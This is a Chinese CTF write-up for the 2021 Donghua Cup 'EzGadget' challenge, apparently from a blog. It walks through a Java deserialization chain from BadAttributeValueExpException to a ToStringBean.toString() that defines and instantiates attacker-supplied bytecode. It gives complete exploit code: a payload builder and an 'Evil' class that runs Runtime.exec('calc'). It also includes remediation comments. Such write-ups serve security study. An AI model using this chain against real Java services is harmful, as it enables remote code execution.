东华杯2021 EzGadget


附件传不上来欸,直接看题吧
首先看路由发现反序列化的点
image.png
接着看pom.xml找有无利用的第三方组件
image.png
似乎只有 spring-boot。然后看其他源码,发现 ToStringBean.java#toString() 里面有 defineClass(),这是好东西哇——在 ClassLoader(类加载器)里面提到过,它就是加载字节码的东西。所以目标明确:从 readObject() 走到 toString(),再到 defineClass()。正好 CC5 中的 BadAttributeValueExpException 调用了 toString,所以直接一把梭。

package com.yq1ng.ezgadget;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.net.URLEncoder;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

/**
 * @author ying
 * @Description 东华杯2021
 * @create 2021-11-10 5:27 PM
 */

public class GetFlag {
        /**
         * Builds the serialized payload the writeup submits to the challenge's deserialization route.
         *
         * Chain, as laid out in the text above: BadAttributeValueExpException.readObject() calls
         * toString() on its {@code val} field; {@code val} is set to a ToStringBean whose toString()
         * passes the bytes in its {@code ClassByte} field to defineClass() and instantiates the result.
         * The stream is prefixed with writeUTF("gadgets") / writeInt(2021); presumably the target
         * reads those two values before readObject() -- not verifiable from this file.
         *
         * Defender's view: the root cause is a Serializable class whose toString() loads arbitrary
         * bytecode from its own serialized state. An ObjectInputFilter / class allow-list on the
         * endpoint (or not deserializing client input at all) stops this chain before
         * toString() is ever reached.
         *
         * @param args unused
         * @throws Exception reflection or file-I/O failure
         */
        public static void main(String[] args) throws Exception{
            //  reuse the second half of the CommonsCollections5 chain: BadAttributeValueExpException -> toString()
            BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
            Class clazz = Class.forName("javax.management.BadAttributeValueExpException");

            // 'val' is private with no setter, so it has to be assigned via reflection
            Field field = clazz.getDeclaredField("val");
            field.setAccessible(true);
            com.ezgame.ctf.tools.ToStringBean toStringBean = new com.ezgame.ctf.tools.ToStringBean();
            field.set(badAttributeValueExpException,toStringBean);

//            a base64-encoded copy of a compiled Evil class was hard-coded here; it is commented out in favor of reading Evil.class from disk below
            byte[] classByte = Files.readAllBytes(Paths.get("F:\\study\\temp\\target\\classes\\com\\yq1ng\\ezgadget\\Evil.class"));
            // ClassByte is private and has no setter either; ToStringBean.toString() is what consumes it
            clazz = Class.forName("com.ezgame.ctf.tools.ToStringBean");
            field = clazz.getDeclaredField("ClassByte");
            field.setAccessible(true);
            field.set(toStringBean,classByte);

            // Stream layout: UTF string, int, then the object graph. Note there is no flush()/close()
            // before toByteArray(); it appears to work because writeObject() drains the block buffer,
            // but oout.flush() would be the safe form.
            ByteArrayOutputStream bout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(bout);
            oout.writeUTF("gadgets");
            oout.writeInt(2021);
            oout.writeObject(badAttributeValueExpException);
            byte[] bytes = bout.toByteArray();
            byte[] encode = Base64.getEncoder().encode(bytes);
            // new String(byte[]) and URLEncoder.encode(String) both use the platform charset;
            // harmless here only because base64 output is pure ASCII
            System.out.println(URLEncoder.encode(new String(encode)));
        }
}
package com.yq1ng.ezgadget;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

/**
 * @author ying
 * @Description
 * @create 2021-11-10 5:20 PM
 */

/**
 * Class whose bytes are placed in ToStringBean.ClassByte. ToStringBean.toString() loads it with
 * defineClass() and calls newInstance(), so the only code that executes is the no-arg constructor
 * (plus any static initializer -- there is none here).
 *
 * The two transform() methods are empty and exist to satisfy AbstractTranslet's abstract methods.
 * NOTE(review): since this chain instantiates the class directly rather than through
 * TemplatesImpl, extending AbstractTranslet looks unnecessary here -- inferred, not verified.
 *
 * Defender's view: any class whose bytes a client can choose and that reaches defineClass() +
 * newInstance() gets its constructor run with the server's privileges; the fix belongs in
 * ToStringBean (never define classes from serialized state), not in filtering this class.
 */
public class Evil extends AbstractTranslet {
    // no-op; required by AbstractTranslet
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    // no-op; required by AbstractTranslet
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    /**
     * Runs at newInstance(). The exception is only printed, so a failed exec() does not
     * break the surrounding toString() call.
     */
    public Evil() {
        try {
            Runtime.getRuntime().exec("calc");
        }
        catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    // unused; the class is never run as a program
    public static void main(final String[] array) {
    }
}
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//

package com.ezgame.ctf.tools;

import java.io.Serializable;

/**
 * The sink of this challenge's gadget chain. Two properties make it dangerous once an instance
 * is reachable from readObject():
 *  - it implements Serializable and {@code ClassByte} is not transient, so that field is
 *    populated directly from the incoming stream;
 *  - {@link #toString()} hands those bytes to {@code defineClass()} and calls
 *    {@code newInstance()}, so a constructor chosen by whoever produced the stream executes.
 * Extending ClassLoader only serves to expose the protected defineClass().
 *
 * Defender's view: do not define classes from serialized state (toString() should not load
 * code at all, and a class that must is better off not Serializable), and guard the
 * deserialization entry point with an ObjectInputFilter / allow-list so a
 * BadAttributeValueExpException-style wrapper cannot reach this toString().
 */
public class ToStringBean extends ClassLoader implements Serializable {
    // raw class-file bytes; serialized with the object, hence attacker-controlled on the receiving side
    private byte[] ClassByte;

    public ToStringBean() {
    }

    /**
     * Defines a class from {@code ClassByte}, instantiates it, and returns a fixed string.
     *
     * The name is passed as null, so the class name comes from the bytecode itself. A fresh
     * ToStringBean is used as the defining loader (presumably so repeated calls do not hit a
     * duplicate-definition LinkageError). The created instance is discarded -- only the
     * constructor's side effects matter.
     *
     * Throws NullPointerException if {@code ClassByte} was never set; errors raised by
     * defineClass() (e.g. ClassFormatError) propagate, while the two caught reflection
     * exceptions are merely printed.
     *
     * @return the literal string {@code "enjoy it."}
     */
    public String toString() {
        ToStringBean toStringBean = new ToStringBean();
        Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
        Object var3 = null;

        try {
            // newInstance() runs the no-arg constructor of the just-defined class
            var3 = clazz.newInstance();
        } catch (InstantiationException var5) {
            var5.printStackTrace();
        } catch (IllegalAccessException var6) {
            var6.printStackTrace();
        }

        return "enjoy it.";
    }
}

文章作者: yq1ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yq1ng !